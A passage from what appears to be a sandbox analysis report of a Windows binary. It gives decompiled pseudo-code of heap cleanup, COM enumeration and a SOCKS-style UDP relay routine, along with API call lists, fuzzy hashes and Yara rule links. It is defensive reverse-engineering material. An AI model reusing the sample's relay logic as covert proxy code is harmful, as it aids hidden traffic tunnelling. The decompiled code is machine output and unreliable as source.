							_t22 = E00410740(_t45 * 8 - _t45 + _t45 * 8 - _t45 + _t45 * 8 - _t45 + _t45 * 8 - _t45 + _t45 * 8 - _t45 + _t45 * 8 - _t45 + _t45 * 8 - _t45 + _t45 * 8 - _t45, 0x42d3e0);
							 *0x42d3e4 = _t45;
							goto L18;
						} else {
							if(_t42 != 0) {
								_t22 = HeapFree( *0x42e6d4, _t45, _t42);
							}
							 *0x42d3e4 = _t45;
							 *0x42d3e0 = 0;
							return _t22;
						}
					}
				}
			}

0x00407480
0x00407494
0x00407496
0x0040749b
0x0040749f
0x004074a7
0x004074b2
0x004074b2
0x004074bb
0x004074c0
0x004074c5
0x004074d1
0x004074d1
0x004074d3
0x004074d8
0x004074e3
0x004074e3
0x004074e5
0x004074ea
0x004074f6
0x004074f6
0x004074f8
0x004074fe
0x00407502
0x0040756c
0x0040756f
0x00407504
0x00407504
0x00407513
0x00407513
0x00407517
0x0040751c
0x0040751f
0x00407520
0x00000000
0x00000000
0x00000000
0x00407520
0x00407524
0x00000000
0x00407526
0x00407528
0x00407561
0x00407566
0x00000000
0x0040752a
0x0040752c
0x00407537
0x00407537
0x00407539
0x00407541
0x0040754c
0x0040754c
0x00407528
0x00407524

APIs

HeapFree.KERNEL32(?,00000000,?,00000000,00000000,?,00408CC2), ref: 004074B2

Part of subcall function 00410740: HeapFree.KERNEL32(?,?,?,0041895B,00000000,00000000,00000000,00000000,0040C6FF,-00002720,00020000,00000000,00000000,?,00000001), ref: 00410752

HeapFree.KERNEL32(?,00000000,?,?,00000000,00000000,?,00408CC2), ref: 004074D1
HeapFree.KERNEL32(?,00000000,?,?,00000000,00000000,?,00408CC2), ref: 004074E3
HeapFree.KERNEL32(?,00000000,?,?,00000000,00000000,?,00408CC2), ref: 004074F6
HeapFree.KERNEL32(?,00000000,00000000,?,00000000,00000000,?,00408CC2), ref: 00407537

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: a1cd3b4bedb8b468622d6cf0a6763ae85d33e24ee051c9446752930e20c9a590
Instruction ID: 3592bf938872c9af8d0e03172393671a629e689cff210ae06a016504bd63b1be
Opcode Fuzzy Hash: a1cd3b4bedb8b468622d6cf0a6763ae85d33e24ee051c9446752930e20c9a590
Instruction Fuzzy Hash: 8D216D71B00201ABD738CB6AED90BA773A8EB98350F94043EA901D7690D738FC01CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00425C80, Relevance: 6.3, APIs: 5, Instructions: 47
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00425C80(void* __eax) {
				void* _t7;
				void* _t8;
				void* _t9;
				void* _t10;
				void* _t22;
				void* _t23;

				_t22 = __eax;
				_t7 =  *(__eax + 4);
				if(_t7 != 0) {
					HeapFree( *0x42e6d4, 0, _t7);
				}
				_t8 =  *(_t22 + 8);
				if(_t8 != 0) {
					HeapFree( *0x42e6d4, 0, _t8);
				}
				_t9 =  *(_t22 + 0xc);
				if(_t9 != 0) {
					HeapFree( *0x42e6d4, 0, _t9);
				}
				_t10 =  *(_t22 + 0x10);
				if(_t10 != 0) {
					_t10 = HeapFree( *0x42e6d4, 0, _t10);
				}
				_t23 =  *(_t22 + 0x14);
				if(_t23 != 0) {
					_t10 = HeapFree( *0x42e6d4, 0, _t23);
				}
				return _t10;
			}

0x00425c81
0x00425c83
0x00425c8f
0x00425c9a
0x00425c9a
0x00425c9c
0x00425ca1
0x00425cad
0x00425cad
0x00425caf
0x00425cb4
0x00425cc0
0x00425cc0
0x00425cc2
0x00425cc7
0x00425cd2
0x00425cd2
0x00425cd4
0x00425cd9
0x00425ce5
0x00425ce5
0x00425ce9

APIs

HeapFree.KERNEL32(?,00000000,00000021,00000000,00000000,00424BC4), ref: 00425C9A
HeapFree.KERNEL32(?,00000000,?,00000000,00000000,00424BC4), ref: 00425CAD
HeapFree.KERNEL32(?,00000000,?,00000000,00000000,00424BC4), ref: 00425CC0
HeapFree.KERNEL32(?,00000000,?,00000000,00000000,00424BC4), ref: 00425CD2
HeapFree.KERNEL32(?,00000000,?,00000000,00000000,00424BC4), ref: 00425CE5

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: a2465c687e62335ff4e3242f452fac64357459c7a13bb4304ebb16d6eee88e0b
Instruction ID: fdbfe7ee017768bb1aec2f4cc02d2d9b1e8a9a78cc12e3c31a78c3abe8f259cb
Opcode Fuzzy Hash: a2465c687e62335ff4e3242f452fac64357459c7a13bb4304ebb16d6eee88e0b
Instruction Fuzzy Hash: E401BB713007106BD634DB6BED40F17B3ECAFA4B10F954529B645D7690D674FC018B68

Uniqueness

Uniqueness Score: -1.00%

Function 0041F7C0, Relevance: 6.2, APIs: 4, Instructions: 243
memorycomCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E0041F7C0() {
				char _v696;
				char _v976;
				char _v992;
				char _v1248;
				char _v1264;
				void* _v1280;
				intOrPtr* _v1296;
				intOrPtr* _v1300;
				signed int _v1312;
				char _v1316;
				char _v1328;
				intOrPtr* _v1336;
				char _v1340;
				intOrPtr* _v1348;
				char _v1352;
				intOrPtr* _v1356;
				char _v1360;
				char _v1364;
				intOrPtr* _v1372;
				signed int _v1380;
				void* _v1384;
				intOrPtr _v1388;
				void* __esi;
				intOrPtr* _t59;
				intOrPtr* _t69;
				intOrPtr* _t72;
				intOrPtr* _t74;
				void* _t76;
				intOrPtr* _t77;
				intOrPtr* _t79;
				intOrPtr* _t82;
				intOrPtr* _t86;
				signed int _t91;
				void* _t93;
				void* _t108;
				void* _t121;
				void* _t138;
				void* _t145;
				intOrPtr* _t146;
				void* _t151;
				void* _t152;
				void* _t156;
				void* _t157;

				_t157 =  &_v1300;
				_t59 =  &_v1280;
				_t108 = 0;
				_v1280 = 0;
				__imp__CoCreateInstance(0x4038f4, 0, 0x4401, 0x403904, _t59);
				if(_t59 == 0) {
					_t59 = _v1300;
					if(_t59 != 0) {
						_push(1);
						_push(0);
						_t146 = _t59;
						_push(_t59);
						_v1296 = _t146;
						_v1312 = 0;
						if( *((intOrPtr*)( *((intOrPtr*)( *_t59 + 0x40))))() == 0) {
							_push( &_v1316);
							_push(0xe);
							_push(_t146);
							if( *((intOrPtr*)( *((intOrPtr*)( *_t146 + 0x14))))() == 0) {
								_t69 = _v1328;
								_push( &_v1340);
								_push(_t69);
								if( *((intOrPtr*)( *((intOrPtr*)( *_t69 + 0x14))))() == 0) {
									do {
										_t74 = _v1348;
										_t76 =  *((intOrPtr*)( *((intOrPtr*)( *_t74 + 0x38))))(_t74,  &_v1340);
										if(_t76 == 0 && _v1348 != _t76) {
											_t82 = _v1356;
											_push(0x100);
											_push( &_v976);
											_push(0x123503f0);
											_push(_t82);
											if( *((intOrPtr*)( *((intOrPtr*)( *_t82 + 0x14))))() == 0) {
												_t145 = E00410AA0( &_v992, 0, 0xffffffff);
											} else {
												_t145 = 0;
											}
											_t86 = _v1372;
											_push(0x100);
											_push( &_v1248);
											_push(0x143203f0);
											_push(_t86);
											if( *((intOrPtr*)( *((intOrPtr*)( *_t86 + 0x14))))() == 0) {
												_t156 = E00410AA0( &_v1264, 0, 0xffffffff);
											} else {
												_t156 = 0;
											}
											E00424100(0x4a,  &_v1328);
											_t151 = 0x4032e8;
											if(_t156 != 0) {
												_t151 = _t156;
											}
											_t138 = 0x4032e8;
											if(_t145 != 0) {
												_t138 = _t145;
											}
											if(_t108 == 0) {
												L19:
												_t121 = 0x4032e8;
											} else {
												_t121 = 0x403964;
												if( *_t108 == 0) {
													goto L19;
												}
											}
											_t91 = 0;
											if(_t108 != 0 &&  *_t108 != 0) {
												do {
													_t91 = _t91 + 1;
													_t173 =  *((short*)(_t108 + _t91 * 2));
												} while ( *((short*)(_t108 + _t91 * 2)) != 0);
											}
											_push(_t151);
											_push(_t138);
											_push(_t121);
											_push( &_v1328);
											_push(_t91);
											_t93 = E00411E10( &_v1384, _t173);
											_t157 = _t157 + 0x14;
											_t152 = _t93;
											if(_t145 != 0) {
												HeapFree( *0x42e6d4, 0, _t145);
											}
											if(_t156 != 0) {
												HeapFree( *0x42e6d4, 0, _t156);
											}
											if(_t152 == 0xffffffff) {
												_v1380 = 0;
											}
											if((_v1380 & 0x00000002) != 0) {
												E00424100(0x53,  &_v1364);
												E0041F5E0(_v1388, 0x129803f0,  &_v1364, 0x129d03e9, 0x129e03f5, 0x129903f0, 0x129a03f6,  &_v1384);
											}
											if((_v1380 & 0x00000004) != 0) {
												E00424100(0x52,  &_v1352);
												E0041F5E0(_v1388, 0x13c403f0,  &_v1352, 0x13c903e9, 0x13ca03f5, 0x13c503f0, 0x13c603f6,  &_v1384);
											}
											if((_v1380 & 0x00000008) != 0) {
												E00424100(0x51,  &_v1340);
												E0041F5E0(_v1388, 0x142803f0,  &_v1340, 0x142d03e9, 0x142e03f5, 0x142903f0, 0x142a03f6,  &_v1384);
											}
											_t108 = _v1384;
										}
										_t77 = _v1356;
										 *((intOrPtr*)( *((intOrPtr*)( *_t77 + 8))))(_t77);
										_t79 = _v1348;
										_push( &_v1360);
										_push(_t79);
									} while ( *((intOrPtr*)( *((intOrPtr*)( *_t79 + 0x14))))() == 0);
									_t146 = _v1348;
								}
								_t72 = _v1336;
								 *((intOrPtr*)( *((intOrPtr*)( *_t72 + 8))))(_t72);
							}
						}
						_t59 =  *((intOrPtr*)( *((intOrPtr*)( *_t146 + 8))))(_t146);
						if(_t108 != 0) {
							if( *_t108 != 0) {
								E00424100(0x3e,  &_v696);
								E0040D880(_t108, 0xcc,  &_v696);
							}
							return HeapFree( *0x42e6d4, 0, _t108);
						}
					}
				}
				return _t59;
			}

0x0041f7c0
0x0041f7ca
0x0041f7d9
0x0041f7e1
0x0041f7e5
0x0041f7ed
0x0041f7f3
0x0041f7f9
0x0041f804
0x0041f806
0x0041f807
0x0041f809
0x0041f80a
0x0041f80e
0x0041f816
0x0041f825
0x0041f826
0x0041f828
0x0041f82d
0x0041f833
0x0041f83d
0x0041f83e
0x0041f846
0x0041f84c
0x0041f84c
0x0041f85b
0x0041f85f
0x0041f86f
0x0041f875
0x0041f881
0x0041f882
0x0041f887
0x0041f88f
0x0041f8a5
0x0041f891
0x0041f891
0x0041f891
0x0041f8a7
0x0041f8ad
0x0041f8b9
0x0041f8ba
0x0041f8bf
0x0041f8c7
0x0041f8dd
0x0041f8c9
0x0041f8c9
0x0041f8c9
0x0041f8e8
0x0041f8ed
0x0041f8f4
0x0041f8f6
0x0041f8f6
0x0041f8f8
0x0041f8ff
0x0041f901
0x0041f901
0x0041f905
0x0041f912
0x0041f912
0x0041f907
0x0041f90b
0x0041f910
0x00000000
0x00000000
0x0041f910
0x0041f917
0x0041f91b
0x0041f922
0x0041f922
0x0041f923
0x0041f923
0x0041f922
0x0041f92a
0x0041f92b
0x0041f92c
0x0041f931
0x0041f932
0x0041f937
0x0041f93c
0x0041f93f
0x0041f943
0x0041f94f
0x0041f94f
0x0041f957
0x0041f962
0x0041f962
0x0041f96b
0x0041f96d
0x0041f96d
0x0041f97a
0x0041f985
0x0041f9af
0x0041f9af
0x0041f9b9
0x0041f9c4
0x0041f9ee
0x0041f9ee
0x0041f9f8
0x0041fa03
0x0041fa2d
0x0041fa2d
0x0041fa32
0x0041fa32
0x0041fa36
0x0041fa40
0x0041fa42
0x0041fa4c
0x0041fa4d
0x0041fa53
0x0041fa5b
0x0041fa5b
0x0041fa5f
0x0041fa69
0x0041fa69
0x0041f82d
0x0041fa71
0x0041fa75
0x0041fa7b
0x0041fa89
0x0041fa98
0x0041fa98
0x00000000
0x0041faa6
0x0041fa75
0x0041f7f9
0x0041fab6

APIs

CoCreateInstance.OLE32(004038F4,00000000,00004401,00403904,?,?,00000000,?,00000001), ref: 0041F7E5
HeapFree.KERNEL32(?,00000000,00000000,000000FF,?,00000000,?,00000001), ref: 0041F94F
HeapFree.KERNEL32(?,00000000,00000000,000000FF,?,00000000,?,00000001), ref: 0041F962

Part of subcall function 00410AA0: MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,0040700E,0000FDE9,?), ref: 00410AE4
Part of subcall function 00410AA0: HeapAlloc.KERNEL32(?,00000008,-00000004,?,?,0040700E,0000FDE9,?), ref: 00410B05
Part of subcall function 00410AA0: MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000001,?,?,0040700E,0000FDE9,?), ref: 00410B34

Part of subcall function 0041F5E0: HeapFree.KERNEL32(?,00000000,00000000), ref: 0041F783
Part of subcall function 0041F5E0: HeapFree.KERNEL32(?,00000000,?), ref: 0041F796
Part of subcall function 0041F5E0: HeapFree.KERNEL32(?,00000000,?), ref: 0041F7AA

HeapFree.KERNEL32(?,00000000,00000000,?,00000000,?,00000001), ref: 0041FAA6

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Free$ByteCharMultiWide$AllocCreateInstance
String ID:
API String ID: 4163679439-0
Opcode ID: 335ccb6acb01ea6cbf2b5b9e09a721c886e48ed20f10ccabc657110128536479
Instruction ID: bf67db8c27ceb3e9aef59fbba1627ae8056701c358c620d921b0dd5f4a699517
Opcode Fuzzy Hash: 335ccb6acb01ea6cbf2b5b9e09a721c886e48ed20f10ccabc657110128536479
Instruction Fuzzy Hash: 21818F71204302AFD710DA59DC80FAB77E9EFC8744F10452EFA4897291DA78DD8ACBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00409349, Relevance: 6.2, APIs: 4, Instructions: 206
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E00409349(void* __ebx, void* __esi, void* __ebp, char _a4, char _a12, void* _a16, signed int _a24, signed int _a28, void* _a30, char _a32, signed int _a36, signed int _a40, signed int _a44, void* _a48, signed int _a52, char _a56, char _a62, signed short _a72, char _a76, char _a80, char _a96, char _a220, signed int _a240, signed int _a244, signed int _a248, signed int _a252, void* _a424, void* _a436, signed short _a448, short _a704, void* _a708, char _a712, char _a716, void* _a728, intOrPtr _a844, signed int _a848, signed int _a1232, signed int _a1256, signed int _a1276) {
				signed int _v0;
				signed int _v4;
				signed int _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				signed int _v24;
				signed char _v25;
				signed int _v28;
				void* _v32;
				void* _v36;
				void* _v44;
				void* _v52;
				void* _t120;

				while(1) {
					__al =  *((intOrPtr*)(__esp + __esi + 0x380));
					__cl =  *((intOrPtr*)(__esp + __esi + 0x68));
					__eflags = __al - __cl;
					if(__al != __cl) {
						goto L16;
					}
					L14:
					__esi = __esi + 1;
					__eflags = __esi - 0x10;
					if(__esi < 0x10) {
						continue;
					} else {
						L18:
						__eflags =  *(__ebx + 2);
						if( *(__ebx + 2) != 0) {
							L50:
							__esi = _a36;
							__eflags = __esi - 0xffffffff;
							if(__esi != 0xffffffff) {
								__edx =  &_a240;
								__eax = E00414B60( &_a240, __esi);
								__eflags = __al;
								if(__al != 0) {
									__ecx =  &_a32;
									__edx =  &_a96;
									0xffff = 0xffff - __edi;
									__ecx = __ebx + __edi;
									__imp__#17(__esi, __ebx + __edi, 0xffff, 0, __edx,  &_a32);
									__ebp = _a28;
									__eflags = 0xffff - __edi;
									if(0xffff - __edi > 0) {
										L54:
										__ecx = 0;
										 *__ebx = __cx;
										 *(__ebx + 2) = __cl;
										__eflags = _a72 - 0x17;
										__edx = __edx & 0xffffff00 | _a72 != 0x00000017;
										__dl = __dl - 1;
										__dl = __dl & 0x00000003;
										__dl = __dl + 1;
										 *(__ebx + 3) = __dl;
										__eflags = __ebp - 0x17;
										if(__ebp != 0x17) {
											__eflags = __ebp - 2;
											if(__ebp == 2) {
												_push(4);
												__ecx =  &_a76;
												goto L58;
											}
										} else {
											_push(0x10);
											__ecx =  &_a80;
											L58:
											_t94 = __ebx + 4; // 0x4
											__edx = _t94;
											__eax = E00410820();
											__ecx =  &_a62;
											_t97 = __edi - 2; // -2
											__edx = __ebx + _t97;
											__eax = E00410820(__ebx + _t97,  &_a62, 2);
											__ecx = _v24;
											__edx =  &_a712;
											__eax = __eax + __edi;
											__eflags = __eax;
											__eax = _v4;
											__imp__#20(_v4, __ebx, __eax, 0,  &_a712, _v24, _t94, __ecx);
										}
									} else {
										__edx = _a72 & 0x0000ffff;
										__eflags = __ebp - __edx;
										if(__ebp == __edx) {
											goto L54;
										}
									}
								}
							}
							__edx = _a1276;
							__eax = _a44;
							__ecx = 0;
							__eflags = __esi - 0xffffffff;
							__ecx = 0 | __eflags != 0x00000000;
							_a244 = _a1276;
							_a248 = __eax;
							_a252 = __esi;
							__ecx = (__eflags != 0) + 2;
							_a240 = (__eflags != 0) + 2;
							__ecx =  &_a240;
							__imp__#18(0,  &_a240, 0, 0, 0);
							__eflags = __eax;
							if(__eax > 0) {
								__ebp = _a24;
								__esi = _a1256;
								__edx =  &_a220;
								__eax = E00414B60( &_a220, __esi);
								__eflags = __al;
								if(__al == 0) {
									goto L5;
								} else {
									__imp__#16(__esi, __ebx, 0xffff, 0);
									__eflags = __eax;
									if(__eax > 0) {
										goto L5;
									}
								}
							}
						} else {
							__eax = 0;
							__eflags =  *__ebx - __ax;
							if( *__ebx != __ax) {
								goto L50;
							} else {
								__eflags = _v20;
								if(_v20 == 0) {
									__edx = _v12;
									__ecx =  &_a52;
									__edx =  &_a716;
									__eax = E00410820( &_a716,  &_a52, _v12);
									__eflags = _a704 - 0x17;
									if(_a704 == 0x17) {
										 *(__esp + 0x310) = __eax;
										 *(__esp + 0x2fc) = __eax;
									}
									__ecx = _v12;
									_v20 = _v12;
								}
								__edx =  &_a52;
								__eax =  *(__ebx + 3) & 0x000000ff;
								__eax = ( *(__ebx + 3) & 0x000000ff) - 1;
								__eflags = __eax;
								if(__eax == 0) {
									__eflags = __ebp - 0xa;
									if(__ebp <= 0xa) {
										goto L50;
									} else {
										_t60 = __ebx + 4; // 0x4
										__eax = _t60;
										__ecx =  &_a56;
										__edx = 2;
										_v12 = 0x10;
										_a52 = __dx;
										__eax = E00410820( &_a56, _t60, 4);
										__esi = 8;
										goto L44;
									}
								} else {
									__eax = __eax - 2;
									__eflags = __eax;
									if(__eax == 0) {
										__al =  *(__ebx + 4);
										__eflags = __al;
										if(__al != 0) {
											__eax = __al & 0x000000ff;
											__ecx = __eax + 7;
											__eflags = __ebp - __eax + 7;
											if(__ebp > __eax + 7) {
												_t37 = __ebx + 5; // 0x5
												__edx = _t37;
												__ecx = __esp + 0x200;
												__eax = E00410820(__esp + 0x200, _t37, __eax);
												__edx =  &_a4;
												 *((char*)(__esp + __eax + 0x200)) = 0;
												_t42 = __eax + 5; // 0x5
												__esi = _t42;
												__eax =  &_a448;
												_a4 = 0;
												__imp__getaddrinfo(__eax, 0, 0,  &_a4);
												__eflags = __eax;
												if(__eax == 0) {
													__ebp = _v0;
													__dl = 0;
													__eflags = 0;
													do {
														__eax = __ebp;
														__eflags = __ebp;
														if(__ebp == 0) {
															goto L37;
														} else {
															__ecx = __dl & 0x000000ff;
															__ecx =  *(__esp + 0x48 + (__dl & 0x000000ff) * 4);
															while(1) {
																__eflags =  *((intOrPtr*)(__eax + 4)) - __ecx;
																if( *((intOrPtr*)(__eax + 4)) == __ecx) {
																	break;
																}
																__eax =  *(__eax + 0x1c);
																__eflags = __eax;
																if(__eax != 0) {
																	continue;
																} else {
																	goto L37;
																}
																goto L60;
															}
															__ecx =  *(__eax + 0x10);
															_v28 =  *(__eax + 0x10);
															__edx = ( &_a36)[6];
															 &_a36 = E00410820( &_a36, ( &_a36)[6], __ecx);
															__eflags = _a24 - 0x17;
															if(_a24 == 0x17) {
																__eax = 0;
																__eflags = 0;
																 *((intOrPtr*)(__esp + 0x78)) = 0;
																_a40 = 0;
															}
															__ecx = _v0;
															__imp__freeaddrinfo(_v0);
															__ebp =  *(__esp + 0x54);
															goto L44;
														}
														goto L60;
														L37:
														__dl = __dl + 1;
														__eflags = __dl - 2;
													} while (__dl < 2);
												}
											}
										}
										goto L50;
									} else {
										__eax = __eax - 1;
										__eflags = __eax;
										if(__eax != 0) {
											goto L50;
										} else {
											__eflags = __ebp - 0x16;
											if(__ebp <= 0x16) {
												goto L50;
											} else {
												_t30 = __ebx + 4; // 0x4
												__ecx = _t30;
												__edx = __esp + 0x70;
												__eax = 0x17;
												_v12 = 0x1c;
												_a52 = __ax;
												_t34 = E00410820(__esp + 0x70, _t30, 0x10) - 3; // -3
												__esi = _t34;
												L44:
												__dx =  *(__ebx + __esi);
												__esi = __esi + 2;
												__eflags = _v8 - 0xffffffff;
												 *((short*)(__esp + 0x62)) = __dx;
												if(_v8 != 0xffffffff) {
													L47:
													__eflags = __ebp - __esi;
													if(__ebp > __esi) {
														__edx = _a52 & 0x0000ffff;
														__eflags =  *(__esp + 0x34) - (_a52 & 0x0000ffff);
														if( *(__esp + 0x34) == (_a52 & 0x0000ffff)) {
															__eax = _v12;
															__eax = _v8;
															__ecx =  &_a52;
															__ebp = __ebp - __esi;
															__eflags = __ebp;
															__edx = __ebx + __esi;
															__imp__#20(_v8, __ebx + __esi, __ebp, 0,  &_a52, _v12);
														}
													}
													goto L50;
													do {
														do {
															do {
																goto L50;
																L5:
																__edx =  &_a220;
																__esi = __ebp;
																_a12 = 0x80;
																__eax = E00414B60( &_a220, __ebp);
																__eflags = __al;
															} while (__al == 0);
															__edx = _a24;
															__eax =  &_a12;
															__ecx =  &_a76;
															__imp__#17(_a24, __ebx, 0xffff, 0,  &_a76, __eax);
															__ebp = __eax;
															_a40 = __ebp;
															__eflags = __ebp;
															if(__ebp > 0) {
																goto L7;
															}
															goto L60;
															L7:
															__eflags = __ebp - 6;
														} while (__ebp < 6);
														__ax = _a52;
														__eflags = _a844 - __ax;
													} while (_a844 != __ax);
													__eflags = __ax - 2;
													if(__ax != 2) {
														__eflags = __ax - 0x17;
														if(__ax != 0x17) {
															goto L18;
														} else {
															__esi = 0;
															while(1) {
																__al =  *((intOrPtr*)(__esp + __esi + 0x380));
																__cl =  *((intOrPtr*)(__esp + __esi + 0x68));
																__eflags = __al - __cl;
																if(__al != __cl) {
																	goto L16;
																}
																goto L14;
															}
															goto L16;
														}
													} else {
														__eax = _a848;
														__eflags = _a848 - _a56;
														L17:
														if(__eflags != 0) {
															goto L50;
														} else {
															goto L18;
														}
													}
												} else {
													__esp + 0x200 = E00410870(__esp + 0x200, __eax, 0, 0x80);
													__ax = _a40;
													__ecx = __ax & 0x0000ffff;
													__edi =  &_a448;
													_a448 = __ax;
													_v4 = __ax & 0x0000ffff;
													__eax = E00415320( &_a448);
													_v20 = __eax;
													__eflags = __eax - 0xffffffff;
													if(__eax != 0xffffffff) {
														 *(__esp + 0x34) =  *(__esp + 0x34) - 0x17;
														__edi =  ~( *(__esp + 0x34) - 0x17);
														asm("sbb edi, edi");
														__edi =  ~( *(__esp + 0x34) - 0x17) & 0xfffffff4;
														__edi = ( ~( *(__esp + 0x34) - 0x17) & 0xfffffff4) + 0x16;
														__eflags = __edi;
														goto L47;
													}
												}
											}
										}
									}
								}
							}
						}
					}
					L60:
					__esi = _v8;
					__eax = E004152D0(__eax, _v8);
					__ebp = _v0;
					__eax = __ebx;
					__eax = E004107C0(__ebx);
					__esi = _v0;
					__eax = E004152D0(__eax, __esi);
					_a4 = E004107C0(_a4);
					__al = _v25;
					__eflags = _v25 - 1;
					if(_v25 != 1) {
						L1:
						return _t120;
					} else {
						__eflags = _v24;
						if(_v24 == 0) {
							goto L1;
						} else {
							__edx = _v4;
							__eax = _v24;
							__ecx = _a1232;
							_push(_v4);
							__eax = _v24 | 0xffffffff;
							__eax = E00408CE0(_v24 | 0xffffffff, _a1232, __eax);
							_pop(__edi);
							_pop(__esi);
							__eflags = __eax;
							_pop(__ebp);
							_t119 = __eax != 0;
							__eflags = _t119;
							__eax = __eax & 0xffffff00 | _t119;
							_pop(__ebx);
							__esp = __esp + 0x4e8;
							return __eax;
						}
					}
					L16:
					__ecx = __cl & 0x000000ff;
					__al & 0x000000ff = (__al & 0x000000ff) - (__cl & 0x000000ff);
					__eflags = (__al & 0x000000ff) - (__cl & 0x000000ff);
					goto L17;
				}
			}

0x00409350
0x00409350
0x00409357
0x0040935b
0x0040935d
0x00000000
0x00000000
0x0040935f
0x0040935f
0x00409360
0x00409363
0x00000000
0x00409365
0x00409375
0x00409375
0x00409379
0x004095a5
0x004095a5
0x004095a9
0x004095ac
0x004095b2
0x004095b9
0x004095be
0x004095c0
0x004095c6
0x004095cb
0x004095d7
0x004095da
0x004095df
0x004095e5
0x004095e9
0x004095eb
0x004095f6
0x004095f6
0x004095f8
0x004095fb
0x004095fe
0x00409604
0x00409607
0x00409609
0x0040960c
0x0040960e
0x00409611
0x00409614
0x0040961e
0x00409621
0x00409623
0x00409625
0x00000000
0x00409625
0x00409616
0x00409616
0x00409618
0x00409629
0x0040962a
0x0040962a
0x0040962e
0x00409635
0x0040963a
0x0040963a
0x0040963f
0x00409644
0x00409649
0x00409653
0x00409653
0x00409656
0x0040965c
0x0040965c
0x004095ed
0x004095ed
0x004095f2
0x004095f4
0x00000000
0x00000000
0x004095f4
0x004095eb
0x004095c0
0x00409662
0x00409669
0x0040966d
0x0040966f
0x00409672
0x0040967b
0x00409682
0x00409689
0x00409690
0x00409693
0x0040969a
0x004096a4
0x004096aa
0x004096ac
0x00409295
0x00409299
0x004092a0
0x004092a7
0x004092ac
0x004092ae
0x00000000
0x004092b0
0x004092b9
0x004092bf
0x004092c1
0x00000000
0x00000000
0x004092c1
0x004092ae
0x0040937f
0x0040937f
0x00409381
0x00409384
0x00000000
0x0040938a
0x0040938a
0x0040938e
0x00409390
0x00409395
0x0040939a
0x004093a2
0x004093a7
0x004093b0
0x004093b2
0x004093b9
0x004093b9
0x004093c0
0x004093c4
0x004093c4
0x004093ce
0x004093d8
0x004093dc
0x004093dc
0x004093dd
0x004094e3
0x004094e6
0x00000000
0x004094ec
0x004094ee
0x004094ee
0x004094f2
0x004094f6
0x004094fc
0x00409504
0x00409509
0x0040950e
0x00000000
0x0040950e
0x004093e3
0x004093e3
0x004093e3
0x004093e6
0x00409422
0x00409425
0x00409427
0x0040942d
0x00409430
0x00409433
0x00409435
0x0040943c
0x0040943c
0x00409440
0x00409448
0x0040944d
0x00409454
0x0040945c
0x0040945c
0x00409461
0x00409469
0x00409471
0x00409477
0x00409479
0x0040947f
0x00409483
0x00409483
0x00409485
0x00409485
0x00409487
0x00409489
0x00000000
0x0040948b
0x0040948b
0x0040948e
0x00409492
0x00409492
0x00409495
0x00000000
0x00000000
0x00409497
0x0040949a
0x0040949c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040949c
0x004094aa
0x004094ad
0x004094b1
0x004094bb
0x004094c0
0x004094c6
0x004094c8
0x004094c8
0x004094ca
0x004094ce
0x004094ce
0x004094d2
0x004094d7
0x004094dd
0x00000000
0x004094dd
0x00000000
0x0040949e
0x0040949e
0x004094a0
0x004094a0
0x004094a5
0x00409479
0x00409435
0x00000000
0x004093e8
0x004093e8
0x004093e8
0x004093e9
0x00000000
0x004093ef
0x004093ef
0x004093f2
0x00000000
0x004093f8
0x004093fa
0x004093fa
0x004093fe
0x00409402
0x00409408
0x00409410
0x0040941a
0x0040941a
0x00409513
0x00409513
0x00409517
0x0040951a
0x0040951f
0x00409524
0x00409578
0x00409578
0x0040957a
0x0040957c
0x00409581
0x00409585
0x00409587
0x0040958c
0x00409590
0x00409597
0x00409597
0x0040959a
0x0040959f
0x0040959f
0x00409585
0x00000000
0x004095a5
0x004095a5
0x004095a5
0x00000000
0x004092c7
0x004092c7
0x004092ce
0x004092d0
0x004092d8
0x004092dd
0x004092dd
0x004092e5
0x004092e9
0x004092ee
0x004092fc
0x00409302
0x00409304
0x00409308
0x0040930a
0x00000000
0x00000000
0x00000000
0x00409310
0x00409310
0x00409310
0x00409319
0x0040931e
0x0040931e
0x0040932c
0x00409330
0x0040933f
0x00409343
0x00000000
0x00409345
0x00409345
0x00409350
0x00409350
0x00409357
0x0040935b
0x0040935d
0x00000000
0x00000000
0x00000000
0x0040935d
0x00000000
0x00409350
0x00409332
0x00409332
0x00409339
0x0040936f
0x0040936f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040936f
0x00409526
0x00409535
0x0040953a
0x0040953f
0x00409542
0x00409549
0x00409551
0x00409555
0x0040955a
0x0040955e
0x00409561
0x0040956b
0x0040956e
0x00409570
0x00409572
0x00409575
0x00409575
0x00000000
0x00409575
0x00409561
0x00409524
0x004093f2
0x004093e9
0x004093e6
0x004093dd
0x00409384
0x00409379
0x004096b2
0x004096b2
0x004096b6
0x004096bb
0x004096bf
0x004096c1
0x004096c6
0x00409812
0x0040981b
0x00409820
0x00409824
0x00409826
0x0040914b
0x00409155
0x0040982c
0x0040982c
0x00409831
0x00000000
0x00409837
